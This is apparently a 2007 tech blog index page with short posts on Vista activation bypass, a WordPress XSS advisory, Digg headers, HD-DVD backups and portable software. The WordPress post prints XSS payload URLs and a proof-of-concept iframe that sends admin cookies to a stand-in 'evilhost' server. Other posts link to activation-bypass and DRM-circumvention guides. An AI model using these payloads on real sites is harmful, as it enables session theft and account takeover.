Microsoft allows large hardware manufacturers (e.g. ASUS, HP, Dell) to ship their products containing a Windows Vista installation that does NOT require any kind of product activation as this might be considered an unnecessary inconvenience for the end-user. Instead these so-called ‘Royalty OEMs’ are granted the right to embed certain license information into their hardware products, which can be validated by Windows Vista…
http://www.haklabs.com/2007/bypass-vista-activation-with-paradox/
→ 1 CommentTags: Windows
A vulnerability has been identified in WordPress, which could be exploited by attackers to execute arbitrary scripting code to compromise the admin account.
Here are some examples of arbitrary code execution:
http://somesite.com/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://somesite.com/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Here is a proof-of-concept code to steal the admin cookies:
<iframe width="0" height="0" src="http://somesite.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27"></iframe>
Solution:
http://trac.wordpress.org/changeset/4951
http://trac.wordpress.org/changeset/4952
Original advisory at seclists.org
→ 2 CommentsTags: Wordpress
Here is something I found at SearchBistro.com a while ago:
What is it? It’s a lab of humans from all over the world (from China to The Netherlands, from Korea to Brasil) They are paid to check search results of Google every day. Most of the employees, called international agents by Google, were recruited through universities all over the world. The aim is to avoid spam, to get the right sites at the top of the listing and to test new features, not shown to the public yet.
→ No CommentsTags: Google
It seems that finally the Digg.com crew pleased some of their users by adding a photo preview. For the time being it seems that is only working for Flickr images… But still it’s pretty cool! Thanks for keeping your users pleased 
→ 1 CommentTags: Digg
I was goofing around with Fiddler (HTTP Debugging Proxy) and I noticed something weird about the response headers from Digg.com. Take a look:
HTTP/1.1 200 OK
Date: Sun, 18 Feb 2007 05:11:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Encoding: gzip
Content-Length: 10657
As our friend Google would say…
Did you mean: Connection
→ 2 CommentsTags: Digg
For all the iPod lovers out there like me, here is an amazing list of all the songs used in all the iPod ads:
http://www.macsupport.ca/2007/02/04/songs-from-ipod-commercials/
Pretty impressive!
→ 1 CommentTags: iPod
15 days ago the first HD-DVD movie was leaked into Bitorrent by someone under the nickname Lyzz. At the time I couldn’t believe that doing a backup of a HD-DVD movie was possible, but after some research and thanks to several amazing tools developed by the community at Doom9.net I found that creating a backup of your favorite HD-DVD movies is possible and even easy. Here is a small guide to create personal backups of your favorite HD-DVD movies. Enjoy it!
→ 1 CommentTags: HD-DVD
Mozilla Firefox is a fast, full-featured web browser that’s easy to use. It has lots of great features including popup-blocking, tabbed-browsing, integrated search, improved privacy features, automatic updating and more. Plus, thanks to the PortableApps.com launcher bundled in Mozilla Firefox - Portable Edition, it leaves no personal information behind on the machine you run it on, so you can take your favorite browser along with all your favorite bookmarks and extensions with you wherever you go.
→ 3 CommentsTags: Firefox
An easy guide to make a portable installation of Adobe Photoshop CS2 and ImageReady (Just 26MB!). This portable installation is perfect for using it under Ubuntu (or any other linux flavor) with the help of WINE.
→ 9 CommentsTags: Software
I was surfing the internet looking for proxies when I stumbled upon this one:
131.107.64.93:80
Quite fast & reliable actually, but as the privacy concerned person that I am I decided to investigate a little further into this proxy just to know whose network I was using ;)….
I was quite shocked to see this because the vast majority of the open proxies out there are due to misconfiguration and they represent a serious security risk.
So please someone tell me why does Microsoft has an open proxy in their corporate network? Is it just misconfiguration… or something more evil?
→ 4 CommentsTags: Microsoft
